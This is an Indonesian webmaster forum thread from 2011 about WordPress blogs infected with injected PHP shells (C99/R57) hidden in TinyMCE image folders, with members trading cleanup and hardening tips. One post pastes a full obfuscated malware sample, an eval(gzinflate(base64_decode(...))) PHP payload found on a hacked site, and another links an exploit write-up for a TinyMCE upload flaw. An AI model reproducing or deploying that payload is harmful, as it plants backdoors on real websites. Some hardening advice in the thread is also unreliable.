1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

Hati-hati SQL Inject / XSS

Discussion in 'Wordpress' started by denaya, Jul 12, 2011.

Page 1 of 2
  1. denaya

    denaya Super Hero

    Joined:
    Aug 13, 2010
    Messages:
    1,381
    Likes Received:
    172
    ada salah satu blog ane yg kena juga, di cek log nya mengarah ke wp-includes yang mana ada beberapa file PHP asing di luar standar File2 Wordpress

    Setelah di telusuri emang benar isi nya, file inject. tepat nya di blog ane pake C99

    Sekedar info ajah, beberapa blog ane di Hostgator juga ada indikasi sama, beberapa kena namun belum sampai "HACKED"

    Silahkan di cek aja

    Code:
    /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img

atau 

/wp-includes/js/tinymce/themes/advanced/skins
Disini ada beberapa folder, coba masuk directory img kalau ada file .php delete aja itu bukan bawaan wordpress
    Install Plugins
    - wp-firewall
    - Block Bad Queries
    - Security Scan
    - Silahkan pilih aja ...

    Contoh di error Log
    Semoga membantu
     
    Last edited: Jul 12, 2011
    denaya, Jul 12, 2011
    #1
    radiusdanu, mutsu, richirich and 3 others like this.
  2. yusrijon

    yusrijon Super Hero

    Joined:
    Jul 11, 2011
    Messages:
    1,268
    Likes Received:
    30
    Location:
    pabasko - by pass
    thanks4sharedotcom bos.
    berarti kalo ada file php dalam folder img,
    web kita kena hack ya bos?
     
    yusrijon, Jul 12, 2011
    #2
  3. denaya

    denaya Super Hero

    Joined:
    Aug 13, 2010
    Messages:
    1,381
    Likes Received:
    172
    Saya kurang tau pasti nya mas, cuman di folder IMG ga ada file php. standar nya gitu. kalo emang penasaran barangkali ada buka aja di notepad. liat isi nya.

    lebih mantap nya buka error log di file manager.
    biasanya kalau ada error2 EVAL gitu ada indikasi kena juga namun belum sampai hacked.

    kalau di blog ane kebetulan pake scripts C99, kalau penasaran googing aja C99Shell atau R57

    buat antisipasi ga ada salahnya :)
     
    denaya, Jul 12, 2011
    #3
  4. JuraganHosting

    JuraganHosting Hero

    Joined:
    Dec 11, 2010
    Messages:
    650
    Likes Received:
    20
    Location:
    www.mantaphosting.com
    nice info gan
    but kalo begituan si sama aja gan
    mending ganti wp-login.php nya ..hehehe
    biar ngenes tuh heker'a dah masuk tapi ga dapet wp login'a ..hahahaha
     
    JuraganHosting, Jul 12, 2011
    #4
  5. ahmadm

    ahmadm Super Hero

    Joined:
    Jul 13, 2010
    Messages:
    1,032
    Likes Received:
    36
    Location:
    Bekasi Timoer
    kalo pengen mencegah sql injection caranye cukup mudah gan, kita tinggal hapus file install.php di folder wp-admin sehabis melakukan instalasi wordpress baru. inget loh ini ane bilang cuma mencegah.

    nih ane tambahin list plugin keamanan yang ane pake selain list plugin diatas:

    -login lockdown
    -secure wordpress
    -wp firewall 2 (bukan yang wp firewall)
     
    ahmadm, Jul 12, 2011
    #5
  6. ifeytea

    ifeytea Ads.id Fan

    Joined:
    Dec 6, 2010
    Messages:
    186
    Likes Received:
    4
    Location:
    Kamp.adsense, Ds.Keyboard, Kec.Monitor, Jawa Barat
    kalo yang ada yang nyisipin script adsense itu biasanya di folder ato file mana yah? coz punyaku ada yang nyisipin. di blog tampilnya di footer.
    di wp-login di tengah ngalangin kalo kita mo masukin username. di wp-admin ngalangin kalo kita mo nulis judul posting. kalo ane ga mikir kasian pasti dah ane klik fraud tuh. sekarang ane biarin coz itu blog minim trafick dan hampir terbengkalai.
     
    ifeytea, Jul 12, 2011
    #6
  7. hernawanjr

    hernawanjr Super Hero

    Joined:
    May 31, 2010
    Messages:
    857
    Likes Received:
    32
    Location:
    di hatimu
    pake versi brapa gan wp nya? harus d temuin lubangnya nih,, ada yg tau???
     
    hernawanjr, Jul 12, 2011
    #7
  8. denaya

    denaya Super Hero

    Joined:
    Aug 13, 2010
    Messages:
    1,381
    Likes Received:
    172
    Footer.php bisa juga di function ..

    ane tambahin gambar biar jelas .. ini di folder
    /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img

    [​IMG]
     
    Last edited: Jul 12, 2011
    denaya, Jul 12, 2011
    #8
  9. ifeytea

    ifeytea Ads.id Fan

    Joined:
    Dec 6, 2010
    Messages:
    186
    Likes Received:
    4
    Location:
    Kamp.adsense, Ds.Keyboard, Kec.Monitor, Jawa Barat
    makasih gan, tapi ane liatdi image ga ada php2nya. di footer ga ada script adsense. di function juga ga ada. penampakanya seperti ini:

    View attachment 9271 View attachment 9272 View attachment 9273 [​IMG]
     
    ifeytea, Jul 12, 2011
    #9
  10. heri83

    heri83 Super Hero

    Joined:
    Jul 31, 2008
    Messages:
    2,328
    Likes Received:
    88
    Location:
    jogja-magelang
    jadi ini solusi permasalahan ane yg disini http://www.adsense-id.com/forums/showthread.php/85086-Please-Help-Me..!-Theme-blog-satu-hosting-kena-inject-kode-anehh.. ya sob?
     
    heri83, Jul 12, 2011
    #10
  11. teguhaditya

    teguhaditya Super Hero

    Joined:
    Jan 23, 2008
    Messages:
    7,503
    Likes Received:
    1,418
    Location:
    _ ▂ ▃ ▅ ▆ █
    sekedar tips, daripada buka satu per satu file yang ada di wp-includes atau mungkin ada di wp-admin

    Code:
    1. backup terlebih dahulu file dan database anda
2. periksa seluruh isi wp-content (termasuk tema dan plugin) kali aja nyelip disana
3. kalau wp-content dah bersih, en gak ada tanda-tanda mencurigakan saatnya ke direktori lain
4. download wordpress versi terbaru http://wordpress.org/latest.tar.gz
5. hapus wp-admin dan wp-includes yang ada di website, replace dengan wp terbaru.
6. tes apakah website berjalan dengan semua.
7. kalau ada error, coba restore dari backupan, kalau mulus-mulus aja berarti proses reinstall wp berhasil.
    untuk versi wp sebelumnya, nanti setelah ter replace semua file wp-admin dan wp-content nya, masih ke namadomain.ext/wp-admin/upgrade.php
    untuk mengugrade dari versi sebelumnya ke versi sekarang
     
    teguhaditya, Jul 12, 2011
    #11
  12. serampangan

    serampangan Super Hero

    Joined:
    Nov 4, 2010
    Messages:
    983
    Likes Received:
    96
    Location:
    Sukoharjo-Tangerang-Sungailiat
    buset ada yg nanem php shell punya gw jg kemaren sempet kena
    iksss
    makanya sekarang table prefix wp nya jangan standar wp_ di ganti apa kek jadi wp548456_
    bisa meminimalisir sql injection attact
    sisanya gw gk tau deh
    hehehehehe
    harus hati2 emang
     
    serampangan, Jul 12, 2011
    #12
  13. anisku11

    anisku11 Super Hero

    Joined:
    Jun 28, 2011
    Messages:
    1,627
    Likes Received:
    179
    Location:
    Semarang
    ,hmm jdi perlu hati2 nih
    hacker merajalela
    :omg:
     
    anisku11, Jul 12, 2011
    #13
  14. retyohet

    retyohet Ads.id Pro

    Joined:
    Feb 28, 2010
    Messages:
    292
    Likes Received:
    12
    Location:
    irc.byroe.net
    Eumm kayanya plugin tiny mce nya yang vulnerable tuh TS, cekidot hxxp://urduhack.blogspot.com/2011/05/tinymce-ajaxfilemanager-upload.html
    Mungkin bisa di restrict di .htaccess nya supaya bot bot bug scanner berbasis perl gak bisa "masuk" :)
     
    retyohet, Jul 13, 2011
    #14
  15. faqih

    faqih Newbie

    Joined:
    Jun 2, 2006
    Messages:
    29
    Likes Received:
    0
    bener bos, tinymce ku di pluging Ucan Post juga mengandung file2 aneh , sama seperti blog agan dan aganwati .....bagi yang sudah pernah kena: cek semua file PHP Anda

    ---------- Post added at 10:37 PM ---------- Previous post was at 10:26 PM ----------

    nambahin penampakan gan:
    PHP:
    <?php /*f5290f31e9c3a739c23b505a32cc7ea1*/ eval(gzinflate(base64_decode('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')));?>
     
    faqih, Jul 13, 2011
    #15
  16. TheNext

    TheNext Super Hero

    Joined:
    Mar 1, 2011
    Messages:
    2,899
    Likes Received:
    211
    Location:
    Ruang Pikiran
    thanks gan tambahannya
     
    TheNext, Jul 13, 2011
    #16
  17. kowek

    kowek Hero

    Joined:
    Nov 25, 2009
    Messages:
    629
    Likes Received:
    15
    aduh bahaya juga. security wp kq semakin lama semakin amburadul yah. kemaren kena 1. segera mengamankan site satu2 nih. :D
     
    kowek, Jul 13, 2011
    #17
  18. radiusdanu

    radiusdanu Super Hero

    Joined:
    Jan 30, 2011
    Messages:
    1,245
    Likes Received:
    278
    Location:
    ASP
    yooo manut
    BTW yg diatas ane siggy nya :omg:
    muantep.... :lol: :lol:
     
    radiusdanu, Jul 13, 2011
    #18
  19. Yahoo!

    Yahoo! Super Hero

    Joined:
    Jul 7, 2011
    Messages:
    835
    Likes Received:
    32
    keren sharenya :D
     
    Yahoo!, Jul 13, 2011
    #19
  20. andhi

    andhi Hosting Indonesia

    Joined:
    Jun 3, 2011
    Messages:
    225
    Likes Received:
    23
    Location:
    Cirebon, Jakarta
    abis masang pengaman disemua blog :omg:
     
    andhi, Jul 13, 2011
    #20
Page 1 of 2

Share This Page